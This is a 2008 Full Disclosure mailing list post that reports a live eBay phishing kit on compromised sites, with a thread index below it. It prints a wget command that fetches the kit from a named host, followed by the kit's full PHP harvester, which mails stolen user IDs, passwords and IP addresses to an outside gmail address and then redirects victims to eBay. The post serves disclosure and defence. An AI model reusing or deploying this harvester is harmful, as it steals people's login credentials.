Full Disclosure mailing list archives
Fresh Phish anyone?
From: "Kevin Finisterre (lists)" <kf_lists () digitalmunition com>
Date: Mon, 22 Dec 2008 13:32:50 -0500
Someone is bored and out making the rounds exploiting random asp pages and web-services. wget http://www.adehkz.net/eb.zip <?php session_start(); $userid = $_POST['userid']; $password = $_POST['password']; $ip = getenv("REMOTE_ADDR"); $subj = "eB - $userid"; $msg = "Username: $userid\nPassword: $password\n....\nIP: $ip"; mail("asdfwr () gmail com", $subj, $msg); header("Location: https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&errmsg=8&pUserId=&co_partnerId=2&siteid=0&pageType=1883&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fmy.ebay.com%2Fws%2FeBayISAPI.dll%3FMyeBay&pp=&migrateVisitor=1 "); ?> I passed this on to the SANS handlers a few days ago but the site is still up and running. Enjoy -KF _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Fresh Phish anyone? Kevin Finisterre (lists) (Dec 22)
- Re: Fresh Phish anyone? anonymous pimp (Dec 22)
- Re: Fresh Phish anyone? Kevin Finisterre (lists) (Dec 22)
- Re: Fresh Phish anyone? n3td3v (Dec 22)
- Re: Fresh Phish anyone? Valdis . Kletnieks (Dec 22)
- Re: Fresh Phish anyone? n3td3v (Dec 22)
- Re: Fresh Phish anyone? j-f sentier (Dec 22)
- Re: Fresh Phish anyone? Kevin Finisterre (lists) (Dec 22)
- Re: Fresh Phish anyone? anonymous pimp (Dec 22)